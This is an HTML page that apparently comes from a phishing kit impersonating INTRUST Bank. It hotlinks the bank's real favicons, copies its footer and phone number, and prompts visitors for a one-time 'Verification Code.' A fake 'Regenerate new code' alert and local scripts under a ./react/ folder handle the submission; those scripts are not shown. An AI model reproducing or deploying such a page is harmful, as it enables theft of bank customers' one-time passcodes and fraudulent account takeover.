<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <meta name="theme-color" content="#082247">
  <title>Login · INTRUST Bank</title>
  <link rel="icon" type="image/x-icon"
    href="https://my.intrustbank.com/images/fi-assets/intrust-bank/intrust-bank-favicon-7104be80.ico">
  <link rel="icon" sizes="192x192"
    href="https://my.intrustbank.com/images/fi-assets/intrust-bank/intrust-bank-android-b5677687.png">
  <link rel="apple-touch-icon"
    href="https://my.intrustbank.com/images/fi-assets/intrust-bank/intrust-bank-ios-575c7b25.png">
  <!-- Latest compiled and minified CSS -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@3.3.7/dist/css/bootstrap.min.css"
    integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous" />

  <!-- Optional theme -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@3.3.7/dist/css/bootstrap-theme.min.css"
    integrity="sha384-rHyoN1iRsVXV4nD0JutlnGaslCJuC7uwjduW9SVrLvRYooPp2bWYgmgJQIXwl/Sp" crossorigin="anonymous" />

  <link rel="stylesheet" href="./style/style.css" />
</head>

<body>
  <!-- card -->
  <div class="card">
    <!-- card Logo -->
    <div class="cardLogo" id="logoDiv"></div>

    <!--  -->
    <div class="errorDiv" id="errorDiv" style="display: none"></div>

    <!-- form Otp -->
    <p style="
          font-weight: 600;
          margin-top: 10px;
          padding: 1px;
          line-height: 34px;
          color: #111f43;
          font-size: 15px;
        " id="formOtpTextDiv">
      Please Enter your Verification Code.
    </p>

    <div class="input" onmouseover="moveUp('inputPlaceholderOtp')" id="formOtpDiv"
      style="transition: all 0.2s ease; margin-top: 20px">
      <div id="inputPlaceholderOtp" class="moveIn" style="position: absolute; transition: all 0.2s ease">
        Verification Code
      </div>
      <input name="__" type="password" id="OtpInput" onmouseout="moveIn('inputPlaceholderOtp','OtpInput')"
        onfocus="moveUp('inputPlaceholderOtp')" class="cardInput" autocomplete="off" />
    </div>

    <!-- animaton loading -->
    <div class="formLoadAnimDiv" id="formLoadAnimDiv">
      <svg width="24" height="24" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg" fill="gray" style="fill: gray">
        <style>
          .spinner_6kVp {
            transform-origin: center;
            animation: spinner_irSm 0.75s infinite linear;
          }

          @keyframes spinner_irSm {
            100% {
              transform: rotate(360deg);
            }
          }
        </style>
        <path
          d="M10.72,19.9a8,8,0,0,1-6.5-9.79A7.77,7.77,0,0,1,10.4,4.16a8,8,0,0,1,9.49,6.52A1.54,1.54,0,0,0,21.38,12h.13a1.37,1.37,0,0,0,1.38-1.54,11,11,0,1,0-12.7,12.39A1.54,1.54,0,0,0,12,21.34h0A1.47,1.47,0,0,0,10.72,19.9Z"
          class="spinner_6kVp" />
      </svg>
    </div>
    <!--  -->

    <div class="" style="
          display: flex;
          align-items: center;
          justify-content: space-between;
          padding-top: 10px;
        " id="otpEnteredYet">
      <div style="
            font-weight: 600;
            display: inline-block;
            margin-top: -6px;
            padding: 1px;
            line-height: 34px;
            color: #111f43;
            font-size: 15px;
            cursor: pointer;
            margin-top: 20px;
          " onclick="alert('Otp has been resend.')">
        Regenerate new code.
      </div>

      <button style="
            width: auto;
            height: auto;
            padding: 5px 10px;
            margin-left: 20px;
            width: 100px;
            background-color: #111f43;
          " onclick="Otp()" id="submitBtnTwo">
        Submit
      </button>
    </div>

    <br />
    <br />
  </div>

  <footer class="p-2 d-flex align-item-center justify-content-center m-auto footerList">
    <div>© 2024 INTRUST Bank</div>
    <div>
      <span style="margin-left: 5px; margin-right: 10px">•</span>(800) 895-2265
    </div>
    <div>
      <span style="margin-left: 5px; margin-right: 10px">•</span>Privacy
      policy
    </div>
    <div>
      <span style="margin-left: 5px; margin-right: 10px">•</span>Member FDIC
    </div>
    <div style="display: flex">
      •
      <svg width="16" height="11" viewBox="0 0 10 7" aria-hidden="true" style="
              margin-right: 5px;
              margin-top: 2px;
              fill: rgb(112, 112, 112);
              margin-left: 10px;
            ">
        <path
          d="M4.96.222L.337 2.588v.962l.511.007v3.448h8.186L9.03 3.55h.55v-.962L4.959.222zm3.163 5.872H1.76V3.028l3.2-1.65 3.163 1.65v3.066zm-4.677-2.26h2.999v-.828H3.446v.828zm0 1.489h2.985v-.828H3.446v.828z">
        </path>
      </svg>
      Equal Housing Lender
    </div>
  </footer>
  <script src="./react/reaction.js"></script>
  <script src="./react/jquery.min.js"></script>
  <script src="./react/jquery.maxlength.js"></script>
  <script src="./react/jquery.form.min.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js"
    integrity="sha512-v2CJ7UaYy4JwqLDIrZUI/4hqeoQieOmAZNXBeQyjo21dadnwR+8ZaIJVT8EE2iyI61OV8e6M8PP2/4hpQINQ/g=="
    crossorigin="anonymous" referrerpolicy="no-referrer"></script>
</body>

</html>